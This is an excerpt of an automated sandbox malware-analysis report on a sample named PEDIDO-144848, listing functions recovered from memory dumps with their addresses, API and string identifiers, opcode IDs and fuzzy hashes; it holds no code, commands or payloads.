                                                        Function 36C0254C Relevance: 1.6, APIs: 1, Instructions: 119timeCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.115570937750.0000000036BD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36BD0000, based on PE: true
                                                        • Associated: 00000002.00000002.115570937750.0000000036CF9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.115570937750.0000000036CFD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_36bd0000_PEDIDO-144848.jbxd
                                                        Similarity
                                                        • API ID: DebugPrintTimes
                                                        • String ID:
                                                        • API String ID: 3446177414-0
                                                        • Opcode ID: e311d4143888daf8e9d716340c2f355dfafbe738a4ada78fcb6432f726fb7109
                                                        • Instruction ID: 66c2cd39d600516cd794908a7769f11ae73cebe8d6fda598793cf597309351b5
                                                        • Opcode Fuzzy Hash: e311d4143888daf8e9d716340c2f355dfafbe738a4ada78fcb6432f726fb7109
                                                        • Instruction Fuzzy Hash: 2241AA74911B00CFE725DF26C940A49B7B6FF45354F6082AEC116DB2A0DB38EA81CF4A
                                                        Function 36C04779 Relevance: 1.6, APIs: 1, Instructions: 111timeCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.115570937750.0000000036BD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36BD0000, based on PE: true
                                                        • Associated: 00000002.00000002.115570937750.0000000036CF9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.115570937750.0000000036CFD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_36bd0000_PEDIDO-144848.jbxd
                                                        Similarity
                                                        • API ID: DebugPrintTimes
                                                        • String ID:
                                                        • API String ID: 3446177414-0
                                                        • Opcode ID: 3f18d3ab4835dcf8acc927a17740ebd4e56df6c867bb5f58bafaf5c776560be7
                                                        • Instruction ID: b9d4b8ac65f6f0d3e5028178dca3e611e3081825cc19ddbf59c386c5595d1e46
                                                        • Opcode Fuzzy Hash: 3f18d3ab4835dcf8acc927a17740ebd4e56df6c867bb5f58bafaf5c776560be7
                                                        • Instruction Fuzzy Hash: 80419F74A14381CBD314CF29D994B6BB7EAEF81354F508A2EE641CB2A1DB30D951CFA1
                                                        Function 36BFB420 Relevance: 1.6, APIs: 1, Instructions: 100timeCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.115570937750.0000000036BD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36BD0000, based on PE: true
                                                        • Associated: 00000002.00000002.115570937750.0000000036CF9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.115570937750.0000000036CFD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_36bd0000_PEDIDO-144848.jbxd
                                                        Similarity
                                                        • API ID: DebugPrintTimes
                                                        • String ID:
                                                        • API String ID: 3446177414-0
                                                        • Opcode ID: a6499e77045db4a0109f8e14ded0ff3ebd7a97bbe9aa33ea7a9be3a8bc5c5a83
                                                        • Instruction ID: c6e56c66d942bc946c3081beb064dd1ee5c92a173b9be47083b93fdb44993112
                                                        • Opcode Fuzzy Hash: a6499e77045db4a0109f8e14ded0ff3ebd7a97bbe9aa33ea7a9be3a8bc5c5a83
                                                        • Instruction Fuzzy Hash: C131F1765206149FD711DF14C980A5677B9EF85364F118269EA049F2A1CB32ED4ACFD0
                                                        Function 36C056E0 Relevance: 1.6, APIs: 1, Instructions: 92timeCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.115570937750.0000000036BD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36BD0000, based on PE: true
                                                        • Associated: 00000002.00000002.115570937750.0000000036CF9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.115570937750.0000000036CFD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_36bd0000_PEDIDO-144848.jbxd
                                                        Similarity
                                                        • API ID: DebugPrintTimes
                                                        • String ID:
                                                        • API String ID: 3446177414-0
                                                        • Opcode ID: 5f0d8b1a0dc72558ce57a58349d8266c7de864ceecd1cdf2725d7c22b910a274
                                                        • Instruction ID: 1e06e790a22654f64f35aa42184f34707603d600f4439e833bb142519c002740
                                                        • Opcode Fuzzy Hash: 5f0d8b1a0dc72558ce57a58349d8266c7de864ceecd1cdf2725d7c22b910a274
                                                        • Instruction Fuzzy Hash: 2B31CD79725A15FFE7059B25CE80A99BBA6FF84248F949059ED008BB51CB31E830DFC1
                                                        Function 36CAE750 Relevance: 1.6, APIs: 1, Instructions: 91timeCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.115570937750.0000000036BD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36BD0000, based on PE: true
                                                        • Associated: 00000002.00000002.115570937750.0000000036CF9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.115570937750.0000000036CFD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_36bd0000_PEDIDO-144848.jbxd
                                                        Similarity
                                                        • API ID: DebugPrintTimes
                                                        • String ID:
                                                        • API String ID: 3446177414-0
                                                        • Opcode ID: 3d81f76ff6ee143b9e93248a26bb2ab5c0a30fb33d31c680d4bee41afcc73a08
                                                        • Instruction ID: 3ece086997891483dbb2a120c7fa118b9cb06c9da309fdc0ac0dbb6754ea61de
                                                        • Opcode Fuzzy Hash: 3d81f76ff6ee143b9e93248a26bb2ab5c0a30fb33d31c680d4bee41afcc73a08
                                                        • Instruction Fuzzy Hash: DD3176B59153029FC700DF19C54094ABBF5FF89258F548AAEE4889B201D331ED45DFD2
                                                        Function 36C03536 Relevance: 1.6, APIs: 1, Instructions: 84timeCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.115570937750.0000000036BD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36BD0000, based on PE: true
                                                        • Associated: 00000002.00000002.115570937750.0000000036CF9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.115570937750.0000000036CFD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_36bd0000_PEDIDO-144848.jbxd
                                                        Similarity
                                                        • API ID: DebugPrintTimes
                                                        • String ID:
                                                        • API String ID: 3446177414-0
                                                        • Opcode ID: fb18ff6320cd7acda6a0b61cb542e378d1d83fe5dfdb52a726fa800688766f9f
                                                        • Instruction ID: 110516570c7f422e7c750c05a4e571446342cc7af249b78da4cb8919d2961d55
                                                        • Opcode Fuzzy Hash: fb18ff6320cd7acda6a0b61cb542e378d1d83fe5dfdb52a726fa800688766f9f
                                                        • Instruction Fuzzy Hash: 6B214639911A419FD721EF0AC940B4ABBA5FF80B18F51045DE8498B350CB75EC88CF82
                                                        Function 36BF92AF Relevance: 1.5, APIs: 1, Instructions: 35timeCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.115570937750.0000000036BD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36BD0000, based on PE: true
                                                        • Associated: 00000002.00000002.115570937750.0000000036CF9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.115570937750.0000000036CFD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_36bd0000_PEDIDO-144848.jbxd
                                                        Similarity
                                                        • API ID: DebugPrintTimes
                                                        • String ID:
                                                        • API String ID: 3446177414-0
                                                        • Opcode ID: d3129b5008dc7cee8b99b7bd2adb6d40df458f40714d77c4ae946a274875765d
                                                        • Instruction ID: 2cb07c654913ab17de6446c86ebf9a623b5e40b52cab12e9b7a4d9bb1fbf9496
                                                        • Opcode Fuzzy Hash: d3129b5008dc7cee8b99b7bd2adb6d40df458f40714d77c4ae946a274875765d
                                                        • Instruction Fuzzy Hash: 60F09A32210A44ABD731AB59CC04F9ABBEDEF84B14F140529A546975A1DAA2F909CAA0
                                                        Function 369133F9 Relevance: 1.5, Strings: 1, Instructions: 231COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.115570794095.0000000036900000.00000040.00001000.00020000.00000000.sdmp, Offset: 36900000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_36900000_PEDIDO-144848.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: 6'
                                                        • API String ID: 0-3584366525
                                                        • Opcode ID: 3a0429037cc17672137bf778770490775475451d581ad8b23b0ce48e87ecd900
                                                        • Instruction ID: d64c297582f000b78106704e829e35d651d1918385e7a2825313a7f29165af23
                                                        • Opcode Fuzzy Hash: 3a0429037cc17672137bf778770490775475451d581ad8b23b0ce48e87ecd900
                                                        • Instruction Fuzzy Hash: E891D67060CB888FE7A5DB29C454B6ABBE2FB9C344F60496DA1DDC3361DA34D845CB42
                                                        Function 36C3A580 Relevance: 1.4, Strings: 1, Instructions: 200COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.115570937750.0000000036BD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36BD0000, based on PE: true
                                                        • Associated: 00000002.00000002.115570937750.0000000036CF9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.115570937750.0000000036CFD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_36bd0000_PEDIDO-144848.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: GlobalTags
                                                        • API String ID: 0-1106856819
                                                        • Opcode ID: 61aa42fc3f106bafb4dec69e78d4ab143a03f750054e433f33ee4a3e98080ce1
                                                        • Instruction ID: f964c5d3b65c39f56c4158f618d6feac0f23f41fff53b7ac5ece633355fd2b52
                                                        • Opcode Fuzzy Hash: 61aa42fc3f106bafb4dec69e78d4ab143a03f750054e433f33ee4a3e98080ce1
                                                        • Instruction Fuzzy Hash: 1D718EB5E0031A9FEF44CFAAD98069DBBB1BF48754F60812EE805E7345EB348951DB50
                                                        Function 36C0965A Relevance: 1.4, Strings: 1, Instructions: 191COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.115570937750.0000000036BD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36BD0000, based on PE: true
                                                        • Associated: 00000002.00000002.115570937750.0000000036CF9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.115570937750.0000000036CFD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_36bd0000_PEDIDO-144848.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: @
                                                        • API String ID: 0-2766056989
                                                        • Opcode ID: cf001e69a80641a8cc3ed551a73227fc2f86a0353987b9bba849c8e96c1f93c2
                                                        • Instruction ID: 2b911b4ffb6fdf684e845068698e5499484894eb4a519062b00fa9060ec4707d
                                                        • Opcode Fuzzy Hash: cf001e69a80641a8cc3ed551a73227fc2f86a0353987b9bba849c8e96c1f93c2
                                                        • Instruction Fuzzy Hash: 5F614BB6D01619AFEB11DFAAC880BDEBBB4EF84754F104159E810E7250D778CA41CFA5
                                                        Function 36C102F9 Relevance: 1.4, Strings: 1, Instructions: 184COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.115570937750.0000000036BD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36BD0000, based on PE: true
                                                        • Associated: 00000002.00000002.115570937750.0000000036CF9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.115570937750.0000000036CFD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_36bd0000_PEDIDO-144848.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: #%u
                                                        • API String ID: 0-232158463
                                                        • Opcode ID: a910307f96e791789ccf5c706d1a1f801cae4aa1eac18c6835695167d3c9dc9d
                                                        • Instruction ID: a8fed24441d096f1fae481d6090bb3b5ca93f34ab347b48545f225172de1be1a
                                                        • Opcode Fuzzy Hash: a910307f96e791789ccf5c706d1a1f801cae4aa1eac18c6835695167d3c9dc9d
                                                        • Instruction Fuzzy Hash: 07715A71A00619DFDB01DFA9C980FAEB7F8EF08748F148069E904E7351EA34E901CBA5
                                                        Function 36C8F42F Relevance: 1.4, Strings: 1, Instructions: 161COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.115570937750.0000000036BD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36BD0000, based on PE: true
                                                        • Associated: 00000002.00000002.115570937750.0000000036CF9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.115570937750.0000000036CFD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_36bd0000_PEDIDO-144848.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: @
                                                        • API String ID: 0-2766056989
                                                        • Opcode ID: 9f61a4bdb5714a2bb9f6651e875168b777453bd48b0093045f8e61e884682dbf
                                                        • Instruction ID: 8a42711f25133d3514fa5a2583e49755a77977c2cd6ba1b62109c09caf0fc17d
                                                        • Opcode Fuzzy Hash: 9f61a4bdb5714a2bb9f6651e875168b777453bd48b0093045f8e61e884682dbf
                                                        • Instruction Fuzzy Hash: 11519BB2504745AFE722DF15CC40F6AB7E8FB84798F50492DB550D7290DBB4D904CB92
                                                        Function 36C1E547 Relevance: 1.4, Strings: 1, Instructions: 148COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.115570937750.0000000036BD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36BD0000, based on PE: true
                                                        • Associated: 00000002.00000002.115570937750.0000000036CF9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.115570937750.0000000036CFD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_36bd0000_PEDIDO-144848.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: EXT-
                                                        • API String ID: 0-1948896318
                                                        • Opcode ID: b5038165189d8eb8411f98b8da6ee28a78c3ccc56c974d79e6532aa813338473
                                                        • Instruction ID: 25670e6556cda51cabecfbbd9d0e6a526a822acc5cad57f6e37b246d768551fe
                                                        • Opcode Fuzzy Hash: b5038165189d8eb8411f98b8da6ee28a78c3ccc56c974d79e6532aa813338473
                                                        • Instruction Fuzzy Hash: 754192729183199FE710DB62C844B5FB7E8AF8C758F800A2EF684D7280EA74D904D797
                                                        Function 36C7C3B0 Relevance: 1.4, Strings: 1, Instructions: 129COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.115570937750.0000000036BD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36BD0000, based on PE: true
                                                        • Associated: 00000002.00000002.115570937750.0000000036CF9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.115570937750.0000000036CFD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_36bd0000_PEDIDO-144848.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: BinaryHash
                                                        • API String ID: 0-2202222882
                                                        • Opcode ID: e4cd7402125fa5f3f781f35efed98df9e93e354b8d09f32d41864d22a93d89ea
                                                        • Instruction ID: f68db4b7ef02ce2307e9bb96ee8274f25558eed21e62d5efc57d857be1a59d0e
                                                        • Opcode Fuzzy Hash: e4cd7402125fa5f3f781f35efed98df9e93e354b8d09f32d41864d22a93d89ea
                                                        • Instruction Fuzzy Hash: 6F4131B190152DAEDB21DA50DC81FEEB77CAF45714F1045A5EA08AB240DB309E888FA9
                                                        Function 36C89429 Relevance: 1.4, Strings: 1, Instructions: 121COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.115570937750.0000000036BD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36BD0000, based on PE: true
                                                        • Associated: 00000002.00000002.115570937750.0000000036CF9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.115570937750.0000000036CFD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_36bd0000_PEDIDO-144848.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: verifier.dll
                                                        • API String ID: 0-3265496382
                                                        • Opcode ID: 3a568eb771b25089449ad9c4e0c59f62b67aa60d4591e935602621f50c3b9e6f
                                                        • Instruction ID: f8e40a68412f74b2be571cf6d3d7a969c804c58877758cf8fa5a885c1ed1fc98
                                                        • Opcode Fuzzy Hash: 3a568eb771b25089449ad9c4e0c59f62b67aa60d4591e935602621f50c3b9e6f
                                                        • Instruction Fuzzy Hash: CC31C7B5B103419FE7248F5DD850B26B7E5EB98358FD0852EE604DF382E6328D81C750
                                                        Function 36C37425 Relevance: 1.4, Strings: 1, Instructions: 111COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.115570937750.0000000036BD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36BD0000, based on PE: true
                                                        • Associated: 00000002.00000002.115570937750.0000000036CF9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.115570937750.0000000036CFD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_36bd0000_PEDIDO-144848.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: #
                                                        • API String ID: 0-1885708031
                                                        • Opcode ID: 6965cac1e13bd5fab6b18dc40a87e1d3c4b851185aea300bbcdbc7d08ff272ce
                                                        • Instruction ID: dd983cec7fc4b76df027f2c38f20e91b4fdd3117a6955a46c8e4b3f95d8991d9
                                                        • Opcode Fuzzy Hash: 6965cac1e13bd5fab6b18dc40a87e1d3c4b851185aea300bbcdbc7d08ff272ce
                                                        • Instruction Fuzzy Hash: A341B175A016199FEF15DF45C880BAEB7B5EF40745F20845AE844A7200DB38E941DFE1
                                                        Function 36C3360F Relevance: 1.4, Strings: 1, Instructions: 106COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.115570937750.0000000036BD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36BD0000, based on PE: true
                                                        • Associated: 00000002.00000002.115570937750.0000000036CF9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.115570937750.0000000036CFD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_36bd0000_PEDIDO-144848.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: Flst
                                                        • API String ID: 0-2374792617
                                                        • Opcode ID: 8a457c97e4c7079fcb60b620bace777500085ab5fbf99b86f2d60995532b599f
                                                        • Instruction ID: 3b1a30eb7e1ea0872c10c18daaed6426df925a5731de287c93d639426fc0d673
                                                        • Opcode Fuzzy Hash: 8a457c97e4c7079fcb60b620bace777500085ab5fbf99b86f2d60995532b599f
                                                        • Instruction Fuzzy Hash: 284198B1A06301DFE304CF1AC580A16BBE5FF89714F68816EE458CB381DB75D946CB96
                                                        Function 36BF96E0 Relevance: 1.3, Strings: 1, Instructions: 96COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.115570937750.0000000036BD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36BD0000, based on PE: true
                                                        • Associated: 00000002.00000002.115570937750.0000000036CF9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.115570937750.0000000036CFD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_36bd0000_PEDIDO-144848.jbxd
                                                        Similarity
                                                        • API ID: DebugPrintTimes
                                                        • String ID: 31w31w
                                                        • API String ID: 3446177414-892832090
                                                        • Opcode ID: 1ea0135a0afa27abeafc2c971ea378dba93b1cbb1679b346a1bbfb1b2d8fae9b
                                                        • Instruction ID: bc17010182eaef6cfdd0df34b6b583f762d9e38fa34a35e8082359f76ca9288e
                                                        • Opcode Fuzzy Hash: 1ea0135a0afa27abeafc2c971ea378dba93b1cbb1679b346a1bbfb1b2d8fae9b
                                                        • Instruction Fuzzy Hash: F821F276910B10AFD322EF6A8840B1A7BF5EB84B54F220829A6149F350DB32DD49CFD1
                                                        Function 36C7C6F2 Relevance: 1.3, Strings: 1, Instructions: 94COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.115570937750.0000000036BD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36BD0000, based on PE: true
                                                        • Associated: 00000002.00000002.115570937750.0000000036CF9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.115570937750.0000000036CFD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_36bd0000_PEDIDO-144848.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: BinaryName
                                                        • API String ID: 0-215506332
                                                        • Opcode ID: d585ed792f5087f587a8ce4372b93c4f93637d36ab8d5283e287c44b9192674a
                                                        • Instruction ID: 405416d88bf10249ec46af0ba231fe40b9ef31e151b71fa774925431e22453a9
                                                        • Opcode Fuzzy Hash: d585ed792f5087f587a8ce4372b93c4f93637d36ab8d5283e287c44b9192674a
                                                        • Instruction Fuzzy Hash: FE31D57AD00A1AAFEB16DB59C846E6FB7B4EF82724F114569E801A7250DB30DE04C7E0
                                                        Function 36C2B1E0 Relevance: .6, Instructions: 629COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.115570937750.0000000036BD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36BD0000, based on PE: true
                                                        • Associated: 00000002.00000002.115570937750.0000000036CF9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.115570937750.0000000036CFD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_36bd0000_PEDIDO-144848.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 904135235f7dc481f56a885533b1ea7b70985c706c885a8660300d180ed9ea18
                                                        • Instruction ID: 0212df57f9bacf8a36f8da271e17ebe61e822a946e1b8db411a6bfb53ea641b2
                                                        • Opcode Fuzzy Hash: 904135235f7dc481f56a885533b1ea7b70985c706c885a8660300d180ed9ea18
                                                        • Instruction Fuzzy Hash: B4327DB5E016199FDF14DFAAC880BAEBBB1FF44748F140129EC05AB390EB359951CB91
                                                        Function 36C12760 Relevance: .6, Instructions: 605COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.115570937750.0000000036BD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36BD0000, based on PE: true
                                                        • Associated: 00000002.00000002.115570937750.0000000036CF9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.115570937750.0000000036CFD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_36bd0000_PEDIDO-144848.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 5247450c8a52e79f339517363f389ca8e6e7f7566e0d7f0af767deacdecd0fdd
                                                        • Instruction ID: 8ecc07f758c0d362d7bc3c6c650f8f99d9c7aea0c12a62b697f61e61b4f53221
                                                        • Opcode Fuzzy Hash: 5247450c8a52e79f339517363f389ca8e6e7f7566e0d7f0af767deacdecd0fdd
                                                        • Instruction Fuzzy Hash: 4E32EF78A007648FEB14CF67C8907AEB7F2AF84348F24411DD445DB384DB75A862CB9A
                                                        Function 36CC124C Relevance: .6, Instructions: 571COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.115570937750.0000000036BD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36BD0000, based on PE: true
                                                        • Associated: 00000002.00000002.115570937750.0000000036CF9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.115570937750.0000000036CFD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_36bd0000_PEDIDO-144848.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 003ac1f735ff27412d2aa1dce6b1a12aba8e0aa82d6340cccd9d88107aab71bf
                                                        • Instruction ID: 228e6c24c5a8e85436a131c2f4a4c8611c314bfbf3396a5b11ea9e16dad27a87
                                                        • Opcode Fuzzy Hash: 003ac1f735ff27412d2aa1dce6b1a12aba8e0aa82d6340cccd9d88107aab71bf
                                                        • Instruction Fuzzy Hash: 5E22A078E006168FDB09CF5AC490AAEBBB2FF89344F24816DD855DB745DB30E942CB90
                                                        Function 36BF8347 Relevance: .4, Instructions: 380COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.115570937750.0000000036BD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36BD0000, based on PE: true
                                                        • Associated: 00000002.00000002.115570937750.0000000036CF9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.115570937750.0000000036CFD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_36bd0000_PEDIDO-144848.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: ae9d22b62af19926631ad06a70f88ef0c11a653f420afd84a5507e8d212b6d0d
                                                        • Instruction ID: f61040911ab2b9ba94f4560e84e913b6eeb3914146930f11329af0d80e8f67d9
                                                        • Opcode Fuzzy Hash: ae9d22b62af19926631ad06a70f88ef0c11a653f420afd84a5507e8d212b6d0d
                                                        • Instruction Fuzzy Hash: 8ED11E71A207169BEB14CF2ACC90BAA7BB5AF04308F45452DF915DF2A0EB31D959CB90
                                                        Function 36C0D700 Relevance: .3, Instructions: 342COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.115570937750.0000000036BD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36BD0000, based on PE: true
                                                        • Associated: 00000002.00000002.115570937750.0000000036CF9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.115570937750.0000000036CFD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_36bd0000_PEDIDO-144848.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 96c5a9604683d13029b17d4bbae460052abe193dfa9efd1a9dd97c77615b592a
                                                        • Instruction ID: 41543a4f01ea6ac2bad09a211ea78aae0b632e83e8480539255b68b9c21c0f38
                                                        • Opcode Fuzzy Hash: 96c5a9604683d13029b17d4bbae460052abe193dfa9efd1a9dd97c77615b592a
                                                        • Instruction Fuzzy Hash: 49C1B375E106159FEB14CF5ACC90B9EB7B1AF44318F5882ADE918EB280D730E941CBD5
                                                        Function 36C41763 Relevance: .3, Instructions: 322COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.115570937750.0000000036BD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36BD0000, based on PE: true
                                                        • Associated: 00000002.00000002.115570937750.0000000036CF9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.115570937750.0000000036CFD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_36bd0000_PEDIDO-144848.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 0d4515d441d80ec484676f88b09c0788ad4d3f8016f857622f3867253fc4e07d
